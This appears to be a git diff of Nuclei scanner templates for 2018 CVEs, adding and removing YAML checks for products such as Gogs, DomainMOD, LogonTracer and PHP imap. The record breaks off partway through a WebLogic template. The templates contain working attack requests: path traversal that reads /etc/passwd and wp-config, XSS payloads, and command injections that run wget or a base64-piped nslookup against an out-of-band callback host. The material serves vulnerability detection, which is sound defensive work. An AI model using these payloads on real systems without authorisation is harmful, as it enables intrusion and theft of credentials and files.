http://packetstormsecurity.com/files/150243/D-LINK-Central-WifiManager-CWM-100-1.03-r0098-Server-Side-Request-Forgery.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N - cvss-score: 8.6 - cve-id: CVE-2018-15517 - cwe-id: CWE-918 - tags: seclists,packetstorm,cve,cve2018,dlink,ssrf,oast - metadata: - max-request: 1 - -http: - - method: GET - path: - - "{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/" - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - -# Enhanced by mp on 2022/04/06 diff --git a/nuclei-templates/CVE-2018/cve-2018-15640.yaml b/nuclei-templates/CVE-2018/CVE-2018-15640.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-15640.yaml rename to nuclei-templates/CVE-2018/CVE-2018-15640.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-15745.yaml b/nuclei-templates/CVE-2018/CVE-2018-15745.yaml deleted file mode 100644 index d271e88968..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-15745.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2018-15745 - -info: - name: Argus Surveillance DVR - Directory Traversal - author: gy741 - severity: high - description: Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter. - reference: - - http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt - - http://packetstormsecurity.com/files/149134/Argus-Surveillance-DVR-4.0.0.0-Directory-Traversal.html - - https://www.exploit-db.com/exploits/45296/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-15745 - cwe-id: CWE-22 - tags: cve,cve2018,argussurveillance,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "for 16-bit app support" - - "[drivers]" - condition: and diff --git a/nuclei-templates/CVE-2018/CVE-2018-16167.yaml b/nuclei-templates/CVE-2018/CVE-2018-16167.yaml new file mode 100644 index 0000000000..11a6ae97f3 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-16167.yaml @@ -0,0 +1,36 @@ +id: CVE-2018-16167 + +info: + name: LogonTracer <=1.2.0 - Remote Command Injection + author: gy741 + severity: critical + description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. + reference: + - https://www.exploit-db.com/exploits/49918 + - https://nvd.nist.gov/vuln/detail/CVE-2018-16167 + - https://jvn.jp/en/vu/JVNVU98026636/index.html + - https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.1 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-16167 + cwe-id: CWE-78 + tags: cve,cve2018,logontracer,rce,oast + +requests: + - raw: + - | + POST /upload HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + +# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2018/CVE-2018-16716.yaml b/nuclei-templates/CVE-2018/CVE-2018-16716.yaml deleted file mode 100644 index 4046e6e054..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-16716.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2018-16716 -info: - name: NCBI ToolBox - Directory Traversal - author: 0x_Akoko - severity: high - description: A path traversal vulnerability exists in viewcgi.c in the 2.0.7 through 2.2.26 legacy versions of the NCBI ToolBox, which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string. - reference: - - https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md - - https://nvd.nist.gov/vuln/detail/CVE-2018-16716 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-16716 - cwe-id: CWE-22 - tags: cve,cve18,ncbi,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-16761.yaml b/nuclei-templates/CVE-2018/CVE-2018-16761.yaml new file mode 100644 index 0000000000..eea41f7f98 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-16761.yaml @@ -0,0 +1,28 @@ +id: CVE-2018-16761 + +info: + name: Eventum v3.3.4 - Open Redirect + author: 0x_Akoko + severity: medium + description: Eventum before 3.4.0 has an open redirect vulnerability. + reference: + - https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/ + - https://www.cvedetails.com/cve/CVE-2018-16761/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-16761 + cwe-id: CWE-601 + tags: cve,cve2018,redirect,eventum + +requests: + - method: GET + path: + - '{{BaseURL}}/eventum/htdocs/select_project.php?url=http://example.com' + - '{{BaseURL}}/eventum/htdocs/clock_status.php?current_page=http://example.com' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/nuclei-templates/CVE-2018/CVE-2018-16836.yaml b/nuclei-templates/CVE-2018/CVE-2018-16836.yaml new file mode 100644 index 0000000000..87db214d73 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-16836.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-16836 + +info: + name: Rubedo CMS <=3.4.0 - Directory Traversal + author: 0x_Akoko + severity: critical + description: Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI. + reference: + - https://www.exploit-db.com/exploits/45385 + - https://nvd.nist.gov/vuln/detail/CVE-2018-16836 + - https://github.com/maroueneboubakri/CVE/tree/master/rubedo-cms + - https://www.exploit-db.com/exploits/45385/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-16836 + cwe-id: CWE-22 + tags: cve,cve2018,rubedo,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/13 diff --git a/nuclei-templates/CVE-2018/CVE-2018-18069.yaml b/nuclei-templates/CVE-2018/CVE-2018-18069.yaml deleted file mode 100644 index 2f61102505..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-18069.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2018-18069 - -info: - name: Wordpress unauthenticated stored xss - author: nadino - severity: medium - description: process_forms in the WPML (aka sitepress-multilingual-cms) plugin through 3.6.3 for WordPress has XSS via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php. - tags: cve,cve2018,wordpress,xss,plugin - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-18069 - cwe-id: CWE-79 - reference: - - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/ - -requests: - - method: POST - path: - - "{{BaseURL}}/wp-admin/admin.php" - body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN">' - redirects: true - - matchers: - - type: dsl - dsl: - - 'contains(tolower(all_headers), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\">")' diff --git a/nuclei-templates/CVE-2018/CVE-2018-18570.yaml b/nuclei-templates/CVE-2018/CVE-2018-18570.yaml new file mode 100644 index 0000000000..dc4cb72724 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-18570.yaml @@ -0,0 +1,37 @@ +id: CVE-2018-18570 + +info: + name: Cross-Site Scripting on Planon web application + author: emadshanab + severity: medium + description: Planon before Live Build 41 has XSS + reference: + - https://www2.deloitte.com/de/de/pages/risk/articles/planon-cross-site-scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2018-18570 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-18570 + cwe-id: CWE-79 + tags: xss,cve,cve2018,planon + +requests: + - method: GET + path: + - '{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + part: body + + - type: word + words: + - "text/html" + part: header diff --git a/nuclei-templates/CVE-2018/CVE-2018-18775.yaml b/nuclei-templates/CVE-2018/CVE-2018-18775.yaml deleted file mode 100644 index a6dcb26ecb..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-18775.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2018-18775 - -info: - author: 0x_Akoko - description: Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the Login.asp Msg parameter - name: Cross Site Scripting in Microstrategy Web version 7 - severity: medium - tags: microstrategy,xss - reference: https://www.exploit-db.com/exploits/45755 - -requests: - - method: GET - path: - - '{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header diff --git a/nuclei-templates/CVE-2018/CVE-2018-18778.yaml b/nuclei-templates/CVE-2018/CVE-2018-18778.yaml deleted file mode 100644 index 6c269ecee5..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-18778.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2018-18778 -info: - name: mini_httpd Path Traversal - author: dhiyaneshDK - severity: medium - description: ACME mini_httpd before 1.30 lets remote users read arbitrary files. - reference: - - https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ - - http://www.acme.com/software/mini_httpd/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.5 - cve-id: CVE-2018-18778 - cwe-id: CWE-200 - tags: cve,cve2018,lfi,mini_httpd -requests: - - raw: - - |+ - GET /etc/passwd HTTP/1.1 - Host: - - unsafe: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" diff --git a/nuclei-templates/CVE-2018/CVE-2018-18925.yaml b/nuclei-templates/CVE-2018/CVE-2018-18925.yaml deleted file mode 100644 index c8cdae0248..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-18925.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2018-18925 - -info: - name: Gogs (Go Git Service) 0.11.66 - Remote Code Execution - author: princechaddha - severity: critical - description: Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a ".." session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron. - reference: - - https://www.anquanke.com/post/id/163575 - - https://github.com/vulhub/vulhub/tree/master/gogs/CVE-2018-18925 - - https://nvd.nist.gov/vuln/detail/cve-2018-18925 - - https://github.com/gogs/gogs/issues/5469 - remediation: This issue will be fixed by updating to the latest version of Gogs. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-18925 - cwe-id: CWE-384 - tags: gogs,lfi,rce,vulhub,cve,cve2018 - metadata: - max-request: 2 - -http: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Cookie: lang=en-US; i_like_gogits=../../../../etc/passwd; - - - | - GET / HTTP/1.1 - Host: {{Hostname}} - Cookie: lang=en-US; i_like_gogits=../../../../etc/dummy; - - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "")' - -# Enhanced by mp on 2022/05/13 diff --git a/nuclei-templates/CVE-2018/CVE-2018-19326.yaml b/nuclei-templates/CVE-2018/CVE-2018-19326.yaml deleted file mode 100644 index d3a0f1379a..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-19326.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2018-19326 - -info: - name: Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal - author: 0x_Akoko - severity: high - description: The vulnerability exists due to path traversal, as demonstrated by reading /etc/passwd. A remote unauthenticated attacker can send a specially crafted URL request containing "dot dot" sequences (/../), conduct directory traversal attack and view arbitrary files. - reference: - - https://www.exploit-db.com/exploits/45904 - - https://www.cybersecurity-help.cz/vdb/SB2018120309 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-19326 - cwe-id: CWE-22 - tags: cve,cve2018,zyxel,lfi,modem - -requests: - - method: GET - path: - - "{{BaseURL}}/../../../../../../../../../../../../etc/passwd" - - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body diff --git a/nuclei-templates/CVE-2018/CVE-2018-19458.yaml b/nuclei-templates/CVE-2018/CVE-2018-19458.yaml deleted file mode 100644 index 1efd4f5fbc..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-19458.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2018-19458 - -info: - name: PHP Proxy 3.0.3 - Local File Inclusion - author: daffainfo - severity: high - description: In PHP Proxy 3.0.3, any user can read files from the server without authentication due to an index.php?q=file:/// LFI URI, a different vulnerability than CVE-2018-19246. - reference: - - https://www.exploit-db.com/exploits/45780 - - https://www.cvedetails.com/cve/CVE-2018-19458 - - https://www.exploit-db.com/exploits/45780/ - - https://pentest.com.tr/exploits/PHP-Proxy-3-0-3-Local-File-Inclusion.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-19458 - cwe-id: CWE-287 - tags: cve,cve2018,lfi,proxy - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?q=file:///etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-19518.yaml b/nuclei-templates/CVE-2018/CVE-2018-19518.yaml new file mode 100644 index 0000000000..7fdbfb819d --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-19518.yaml @@ -0,0 +1,41 @@ +id: CVE-2018-19518 + +info: + name: PHP imap - Remote Command Execution + author: princechaddha + severity: high + description: | + University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a "-oProxyCommand" argument. + reference: + - https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19518 + - https://www.openwall.com/lists/oss-security/2018/11/22/3 + - https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.5 + cve-id: CVE-2018-19518 + cwe-id: CWE-88 + metadata: + confidence: tenative + tags: imap,dast,vulhub,cve,cve2018,rce,oast,php + +requests: + - method: GET + path: + - "{{BaseURL}}" + + payloads: + php-imap: + - "x -oProxyCommand=echo {{base64(url_encode('nslookup {{interactsh-url}}'))}}|base64 -d|sh}" + + fuzzing: + - part: query + fuzz: + - "{{php-imap}}" + + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" diff --git a/nuclei-templates/CVE-2018/CVE-2018-19752.yaml b/nuclei-templates/CVE-2018/CVE-2018-19752.yaml new file mode 100644 index 0000000000..4876f6389a --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-19752.yaml @@ -0,0 +1,52 @@ +id: CVE-2018-19752 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD through 4.11.01 has XSS via the assets/add/registrar.php notes,registrar field. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-19752 + - https://github.com/domainmod/domainmod/issues/84 + - https://www.exploit-db.com/exploits/45949/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-19752 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2018,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/registrar.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test + - | + GET /assets/registrars.php HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">' + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-19877.yaml b/nuclei-templates/CVE-2018/CVE-2018-19877.yaml deleted file mode 100644 index 1a7a7645d2..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-19877.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2018-19877 -info: - name: Adiscon LogAnalyzer 4.1.7 - Cross Site Scripting - author: arafatansari - severity: medium - description: | - Adiscon LogAnalyzer before 4.1.7 is affected by Cross-Site Scripting (XSS) in the 'referer' parameter of the login.php file. - reference: - - https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/ - - https://www.exploit-db.com/exploits/45958/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-19877 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2018,adiscon,xss -requests: - - method: GET - path: - - "{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E" - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'value="">' - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-19914.yaml b/nuclei-templates/CVE-2018/CVE-2018-19914.yaml new file mode 100644 index 0000000000..f74e59b810 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-19914.yaml @@ -0,0 +1,46 @@ +id: CVE-2018-19914 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/dns.php Profile Name or notes field. + reference: + - https://www.exploit-db.com/exploits/46375/ + - https://github.com/domainmod/domainmod/issues/87 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-19914 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2018,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/dns.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E + - | + GET /assets/dns.php HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + redirects: true + max-redirects: 2 + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(all_headers_3, "text/html")' + - 'contains(body_3, ">")' + condition: and diff --git a/nuclei-templates/CVE-2018/CVE-2018-20010.yaml b/nuclei-templates/CVE-2018/CVE-2018-20010.yaml deleted file mode 100644 index ca5de31180..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-20010.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: CVE-2018-20010 -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/ssl-provider-account.php Username field. - reference: - - https://www.exploit-db.com/exploits/46373/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-20010 - - https://github.com/domainmod/domainmod/issues/88 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-20010 - cwe-id: CWE-79 - metadata: - verified: true - tags: cve,cve2018,domainmod,xss,authenticated -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - POST /assets/add/ssl-provider-account.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes= - - | - GET /assets/ssl-accounts.php HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' - - 'contains(body_3, ">")' - condition: and diff --git a/nuclei-templates/CVE-2018/CVE-2018-20011.yaml b/nuclei-templates/CVE-2018/CVE-2018-20011.yaml new file mode 100644 index 0000000000..b48e1aa0cb --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-20011.yaml @@ -0,0 +1,47 @@ +id: CVE-2018-20011 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/category.php CatagoryName, StakeHolder parameters. + reference: + - https://www.exploit-db.com/exploits/46374/ + - https://github.com/domainmod/domainmod/issues/88 + - https://nvd.nist.gov/vuln/detail/CVE-2018-20011 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-20011 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve1028,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/category.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes= + - | + GET /assets/categories.php HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + redirects: true + max-redirects: 2 + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(all_headers_3, "text/html")' + - 'contains(body_3, ">")' + condition: and diff --git a/nuclei-templates/CVE-2018/CVE-2018-20470.yaml b/nuclei-templates/CVE-2018/CVE-2018-20470.yaml new file mode 100644 index 0000000000..5d89cd2d44 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-20470.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-20470 + +info: + name: Sahi pro 7.x/8.x - Directory Traversal + author: daffainfo + severity: high + description: An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files. + reference: + - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/ + - https://www.cvedetails.com/cve/CVE-2018-20470 + - http://packetstormsecurity.com/files/153330/Sahi-Pro-7.x-8.x-Directory-Traversal.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-20470 + cwe-id: CWE-22 + tags: cve,cve2018,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body diff --git a/nuclei-templates/CVE-2018/CVE-2018-20985.yaml b/nuclei-templates/CVE-2018/CVE-2018-20985.yaml new file mode 100644 index 0000000000..71ed01c5b8 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-20985.yaml @@ -0,0 +1,39 @@ +id: CVE-2018-20985 + +info: + name: WordPress Payeezy Pay <=2.97 - Local File Inclusion + author: daffainfo + severity: critical + description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected. + reference: + - https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/ + - https://wordpress.org/plugins/wp-payeezy-pay/#developers + - https://www.cvedetails.com/cve/CVE-2018-20985/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-20985 + cwe-id: CWE-20 + tags: cve,cve2018,wordpress,lfi,plugin + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php" + + body: "x_login=../../../wp-config" + + matchers-condition: and + matchers: + - type: word + words: + - "The base configuration for WordPress" + - "define( 'DB_NAME'," + - "define( 'DB_PASSWORD'," + condition: and + part: body + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/13 diff --git a/nuclei-templates/CVE-2018/CVE-2018-2628.yaml b/nuclei-templates/CVE-2018/CVE-2018-2628.yaml deleted file mode 100644 index 4fcb606989..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-2628.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2018-2628 - -info: - name: Oracle WebLogic Server Deserialization - Remote Code Execution - author: milo2012 - severity: critical - description: | - The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contains an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server. - reference: - - https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628 - - https://nvd.nist.gov/vuln/detail/CVE-2018-2628 - - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html - - http://www.securitytracker.com/id/1040696 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-2628 - cwe-id: CWE-502 - tags: cve,cve2018,oracle,weblogic,network,deserialization - -network: - - inputs: - - data: 